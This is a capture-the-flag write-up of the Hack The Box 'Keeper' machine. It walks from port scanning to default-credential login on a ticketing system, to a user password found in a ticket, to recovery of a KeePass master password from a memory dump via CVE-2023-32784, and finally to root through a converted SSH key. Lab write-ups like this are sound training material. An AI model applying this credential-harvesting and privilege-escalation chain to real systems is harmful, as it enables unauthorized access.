- Target IP: 10.10.11.227
- Local IP: 10.10.14.68
0x01 Information Gathering#
nmap port scanning
Port 80 and Port 22 are open.
Accessing the page on Port 80:
Setting up hosts file to resolve the domain
Accessing http://tickets.keeper.htb/, we can see the following page
0x02 Vulnerability Exploitation#
Based on some hints on the page, search for "Best Practical Solutions, LLC username password" and find the official documentation.
The default password is root/password as shown in the above image, let's try logging in.
Multiple login attempts are required to successfully log in.
There are two users.
The password for lnorgaard is New user. Initial password set to Welcome2023!
Let's log in to this account and see.
Found an issue with keepass.
It tells us that there is a problem with the keepass client.
Download the attachment.
After trying for a while, I couldn't download it. Let's try logging in to ssh using lnorgaard/Welcome2023!.
Successful login.
Obtained user.txt.
0x03 Privilege Escalation#
From the above image, we can see that there are three files in addition to user.txt: KeePassDumpFull.dmp RT30000.zip passcodes.kdbx.
Log in to sftp and download these three files.
Contents of RT30000.zip
Open with an application, requires account password login.
In cases like this where a dmp file is provided, passwords can usually be extracted from the dmp file. Let's try using mimikatz to dump the password, but it failed.
After searching, I found that there is a vulnerability in keepass for retrieving the master password, with the vulnerability ID CVE-2023-32784.
Let's search for a poc on GitHub.
Github Repo not found
The embedded github repo could not be found…
The output is as follows:
Possible password: ●Mdgr●d med fl●de
Let's try a Google search.
rødgrød med fløde
Let's try this password to open the kbdx file.
Found the password and key for root.
Save the above key file as txt, and then convert it to an ssh certificate using puttygen.
Puttygen tool needs putty to be installed.
Install putty on Mac:
brew install putty
Then execute the following command to generate the keeper.pem file:
puttygen 123.txt -O private-openssh -o keeper.pem
Give permission to connect:
chmod 600 keeper.per
ssh [email protected] -i keeper.pem
Successfully connected with root privileges, obtain root.txt.
0x04 Conclusion#
- Unexpected to obtain user.txt through ssh login.
- Learned about the keepass vulnerability for retrieving the master key.